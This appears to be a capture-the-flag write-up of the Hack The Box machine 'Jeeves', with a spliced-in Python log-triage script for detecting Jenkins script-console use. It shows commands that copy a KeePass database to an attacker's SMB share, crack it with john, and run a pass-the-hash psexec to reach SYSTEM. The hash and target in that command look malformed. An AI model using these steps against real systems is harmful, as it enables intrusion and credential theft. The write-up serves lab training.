Jeeves is a vulnerable Windows machine among the retired machines; the goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to get to know the target machine.
Full Port Scan
The port scan shows the following open ports: 80/tcp (Microsoft IIS httpd 10.0), 135/tcp (Microsoft Windows RPC), 445/tcp (microsoft-ds, Microsoft Windows 7 – 10, workgroup: WORKGROUP) and 50000/tcp (http, Jetty 9.4.z-SNAPSHOT).
We enumerate port 80 first.
We looked at the page source in the browser's developer mode and with Wappalyzer, but got no useful results.
No matter what we type in the search section, the server keeps returning an error 🙂
We did not get any valuable information here, so let's check for hidden files and directories with gobuster.
The file and directory search did not reveal anything valuable either. Let's move on.
Let's see whether HTTP is also served on port 50000.
Here we find Jetty. (Eclipse Jetty is a Java web server and Java Servlet container. While web servers are usually associated with serving documents to people, Jetty is now often used for machine-to-machine communication within larger software frameworks.)
Here we run a file and directory scan against port 50000.
We detect the /askjeeves directory.
Let's visit it.
Here we land on the Jenkins dashboard immediately, without being asked to log in.
Since Jenkins is an automation server, an interface like this that we can enumerate almost certainly gives some kind of direct access to the underlying machine. Under Manage Jenkins in the top-left menu, a Script Console appears.
There we come across a Groovy script console, and I had no prior knowledge of this language.
The part that interests me is that it offers a way to get a shell on the machine.
Looking at the first GitHub page in the search results,
I use that code and run it.
We get a shell as the user jeeves\kohsuke.
We now perform local enumeration to escalate to administrator privileges.
I go to the Documents directory.
There I come across a .kdbx file, which I recognise as a KeePass database.
If I can recover the passwords stored in this database, I can get the root flag.
Let's transfer this database to our own machine.
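The script console visited above is also what a defender should be watching for. The following is an added example, not part of the original writeup: a small Python triage script that flags Jenkins script-console requests (the /script and /scriptText endpoints of a Jenkins install) in NCSA-style request log lines. The log lines are constructed, and the /askjeeves context path comes from this box.

```python
import re
from collections import Counter

# Constructed sample lines in NCSA common log format (hosts, users and
# timestamps are made up); Jetty-hosted Jenkins can emit this format when
# request logging is enabled.
SAMPLE_LOG = """\
10.10.14.19 - - [08/Nov/2017:10:02:11 +0000] "GET /askjeeves/ HTTP/1.1" 200 5123
10.10.14.19 - - [08/Nov/2017:10:02:40 +0000] "GET /askjeeves/manage HTTP/1.1" 200 9876
10.10.14.19 - - [08/Nov/2017:10:03:05 +0000] "GET /askjeeves/script HTTP/1.1" 200 4321
10.10.14.19 - - [08/Nov/2017:10:03:30 +0000] "POST /askjeeves/script HTTP/1.1" 200 2048
10.10.14.19 - - [08/Nov/2017:10:04:01 +0000] "POST /askjeeves/scriptText HTTP/1.1" 200 37
10.10.10.5 - alice [08/Nov/2017:10:05:00 +0000] "GET /askjeeves/job/build/1/console HTTP/1.1" 200 777
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Jenkins' Groovy console endpoints; any context path (here /askjeeves) precedes them.
CONSOLE_SUFFIXES = ("/script", "/scriptText")

def parse_line(line):
    """Parse one NCSA line into a dict, or return None for lines we cannot read."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_console_path(path):
    """True for the script console, ignoring query string and trailing slash."""
    path = path.split("?", 1)[0].rstrip("/")
    return path.endswith(CONSOLE_SUFFIXES)

def find_console_use(log_text):
    """Return every request to the script console; a POST means a script was run."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_console_path(rec["path"]):
            continue
        hits.append({
            "ts": rec["ts"], "ip": rec["ip"], "user": rec["user"], "path": rec["path"],
            "executed": rec["method"] == "POST",  # GET only views the console form
            "anonymous": rec["user"] == "-",      # no authenticated principal logged
        })
    return hits

def summarize(log_text):
    """Count script executions per (source IP, user) for quick triage."""
    return Counter((h["ip"], h["user"]) for h in find_console_use(log_text) if h["executed"])

if __name__ == "__main__":
    for h in find_console_use(SAMPLE_LOG):
        print(h)
    print(summarize(SAMPLE_LOG))
```

An anonymous POST to these endpoints, as in the sample, is exactly the trace the console-to-shell step above leaves behind, so it is worth alerting on outright.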
Here we first start smb server on our attacker machine.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py ma .
Then copy the CEH.kdbx file from the target machine to the share:
copy C:\Users\kohsuke\Documents\CEH.kdbx \\10.10.14.19\ma\CEH.kdbx
The database now arrives on our attacker machine.
Here we convert the kdbx file into a hash with the keepass2john tool,
and then we try to crack it with john:
└─# keepass2john CEH.kdbx > hash_db
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash_db
Here we successfully cracked the master password: "moonshine1".
We opened the database with the keepassx tool.
This is how we accessed the stored entries.
One of the entries holds a hash (we tried the other passwords without a successful login).
Here we try a pass-the-hash attack using the psexec.py tool:
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238ff238cbe81fe00 email@example.com cmd.exe
We obtain a shell as nt authority\system.
We notice that there is no flag in the Desktop folder, so let's look at the Alternate Data Streams to make sure the flag is not hidden there.
This is how we got the root flag.